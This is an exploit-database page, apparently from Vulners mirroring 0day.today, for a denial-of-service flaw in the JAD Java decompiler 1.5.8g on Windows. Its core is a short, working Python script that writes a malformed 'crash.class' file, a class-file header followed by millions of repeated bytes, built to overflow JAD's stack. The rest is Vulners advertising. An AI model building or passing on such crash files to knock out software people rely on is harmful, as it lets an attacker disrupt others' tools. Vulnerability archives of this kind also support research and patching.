Lucene search
K

JAD java decompiler 1.5.8g (.class) Stack Overflow DoS

🗓️ 09 Mar 2010 00:00:00Reported by l3DType 
zdt
 zdt
🔗 0day.today👁 11 Views

JAD java decompiler 1.5.8g can suffer from a Stack Overflow DoS vulnerability in Windows.

Code
======================================================
JAD java decompiler 1.5.8g (.class) Stack Overflow DoS
======================================================

#!/usr/bin/env python
#JAD java decompiler 1.5.8g (.class) Stack Overflow DoS
#Tested on Windows
#Software Link: http://www.varaneckas.com/jad
#Author: l3D

header='\xca\xfe\xba\xbe\x01\x04\x01\x04\xff\xff'
evil='\x07\x01\x01'*0x100000
bad=open('crash.class', 'w')
bad.write(header+evil)
bad.close()



#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation